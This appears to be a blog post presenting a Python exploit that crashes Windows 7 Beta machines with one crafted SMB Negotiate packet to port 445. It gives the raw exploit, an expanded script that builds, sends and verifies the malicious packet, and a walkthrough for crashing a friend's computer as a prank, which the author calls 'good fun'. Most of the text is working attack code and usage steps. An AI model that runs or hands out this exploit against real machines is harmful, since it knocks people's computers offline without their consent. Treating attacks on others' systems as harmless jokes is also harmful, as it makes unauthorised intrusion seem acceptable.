Crash Windows 7 Beta0
Posted In Python By John Hass
I know this is old, but I want to post it since I wasn't able to write to this blog until today. Windows 7 Beta and the first corporate release had an SMB bug: an attacker could send a single crafted packet to the SMB service (TCP port 445) and blue screen the machine. The exploit is very simple.
#!/usr/bin/env python3
from socket import socket

host = ("192.168.1.103", 445)

buff = (
    b"\x00\x00\x00\x90"  # NetBIOS session message, length 0x90 (144 bytes follow)
    b"\xff\x53\x4d\x42"  # Begin SMB header: Server Component "\xffSMB"
    b"\x72\x00\x00\x00"  # Command: Negotiate Protocol (0x72), NT status ...
    b"\x00\x18\x53\xc8"  # ... status, Flags 0x18, Flags2 0xc853
    b"\x00\x26"          # Process ID High: --> :) normal value should be b"\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"  # signature, reserved, TID 0xffff, PID 0xfeff
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"  # UID, MID, WordCount 0, ByteCount 0x6d, dialects
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"  # "PC NETWORK PROGRAM 1.0"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"  # "LANMAN1.0"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"  # "Windows for Workgroups 3.1a"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"  # "LM1.2X002", "LANMAN2.1"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"  # "NT LM 0.12"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"  # "SMB 2.002"
    b"\x30\x30\x32\x00"
)

s = socket()
s.connect(host)
s.send(buff)
s.close()
Now, I did not write this code, but I did use it to my advantage. Let's just say it helps with convincing people to switch to a Mac or Linux, so here is how to use it.
Load the Python script on any Linux computer on the same network as the target machine. Edit the file and change the host to the target's address. Get your buddy on IM and ask them how they are liking Windows 7. When they tell you "Oh, it's great, it's fast, way better than Vista", crash the machine. Immediately set up a ping on your machine and watch for the replies to come back in; once they do, your buddy should be back on IM. Ask them what happened, and they will respond with "Oh, Windows 7 crashed". Then laugh, rinse and repeat...
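The script above hard-codes the packet as one opaque blob, so it is not obvious what is special about it. The following is an added example, not the post's own script: it builds the same SMB1 Negotiate Protocol request field by field with struct, decodes it back so you can see that the only thing unusual is the Process ID High header field (0x2600 instead of the normal 0), and replaces the ping loop from the walkthrough with a TCP connect poll against port 445. The target address, port and timeouts are illustrative assumptions; building with pid_high=0x2600 reproduces the post's bytes exactly.

```python
#!/usr/bin/env python3
"""Build, decode and send the SMB1 Negotiate Protocol request from the post.

Added example for this page, not the original script. The header layout is
the standard 32-byte SMB1 header; the post's packet differs from a normal
client's request only in Process ID High. Host, port and timeouts are assumed.
"""
import socket
import struct
import time

SMB_COM_NEGOTIATE = 0x72
HEADER_FMT = "<4sBIBHH8sHHHHH"  # 32 bytes, little-endian, no padding

# Dialects carried by the post's packet, in the same order.
DIALECTS = [
    b"PC NETWORK PROGRAM 1.0",
    b"LANMAN1.0",
    b"Windows for Workgroups 3.1a",
    b"LM1.2X002",
    b"LANMAN2.1",
    b"NT LM 0.12",
    b"SMB 2.002",
]


def build_negotiate(pid_high=0, tid=0xFFFF, pid=0xFEFF, dialects=DIALECTS):
    """Return a NetBIOS-framed Negotiate Protocol request.

    pid_high=0 is what a normal client sends; pid_high=0x2600 reproduces the
    post's packet byte for byte (bytes 00 26 on the wire).
    """
    header = struct.pack(
        HEADER_FMT,
        b"\xffSMB",         # protocol id
        SMB_COM_NEGOTIATE,  # command
        0,                  # NT status
        0x18,               # Flags: canonical paths, case insensitive
        0xC853,             # Flags2: unicode, NT status, ext. security, long names
        pid_high,           # Process ID High
        b"\x00" * 8,        # security signature
        0,                  # reserved
        tid,                # tree id
        pid,                # process id (low word)
        0,                  # user id
        0,                  # multiplex id
    )
    # Data block: each dialect is a 0x02 buffer-format byte plus an ASCIIZ name.
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    body = header + struct.pack("<BH", 0, len(data)) + data  # WordCount, ByteCount
    # NetBIOS session message: type 0x00 followed by a 24-bit big-endian length.
    return b"\x00" + len(body).to_bytes(3, "big") + body


def parse_negotiate(packet):
    """Decode a request back into the fields worth checking."""
    if packet[0] != 0 or int.from_bytes(packet[1:4], "big") != len(packet) - 4:
        raise ValueError("bad NetBIOS session header")
    smb = packet[4:]
    (proto, cmd, _status, flags, flags2, pid_high, _sig, _rsvd,
     tid, pid, uid, mid) = struct.unpack(HEADER_FMT, smb[:32])
    if proto != b"\xffSMB" or cmd != SMB_COM_NEGOTIATE:
        raise ValueError("not an SMB1 Negotiate Protocol request")
    wct, bcc = struct.unpack("<BH", smb[32:35])
    data = smb[35:35 + bcc]
    if wct != 0 or len(data) != bcc:
        raise ValueError("truncated or malformed data block")
    dialects = [d[1:] for d in data.split(b"\x00") if d.startswith(b"\x02")]
    return {"flags": flags, "flags2": flags2, "pid_high": pid_high, "tid": tid,
            "pid": pid, "uid": uid, "mid": mid, "dialects": dialects}


def send_negotiate(host, port=445, pid_high=0x2600, timeout=5.0):
    """Send one request and return the server's reply (empty if none came)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate(pid_high=pid_high))
        try:
            return s.recv(4096)
        except (socket.timeout, ConnectionError):
            return b""


def wait_for_port(host, port=445, timeout=300.0, interval=2.0):
    """Poll the TCP port until it accepts connections again (a TCP connect
    stands in for the post's ping loop). Returns seconds waited, or None."""
    start = time.monotonic()
    while time.monotonic() - start < timeout:
        try:
            with socket.create_connection((host, port), timeout=interval):
                return time.monotonic() - start
        except OSError:
            time.sleep(interval)
    return None


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.103"  # address from the post
    print("reply:", send_negotiate(target)[:4].hex() or "none")
    print("port 445 back after (s):", wait_for_port(target))
```

Run it as `python3 smbneg.py 192.168.1.103` on the same network; a healthy SMB server answers the request, while the affected box simply stops responding until the port comes back. Comparing `build_negotiate()` with `build_negotiate(pid_high=0x2600)` shows that the two requests differ only at bytes 16 and 17 of the frame.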
The exploit is old and should only be used in good fun; it was fun for me.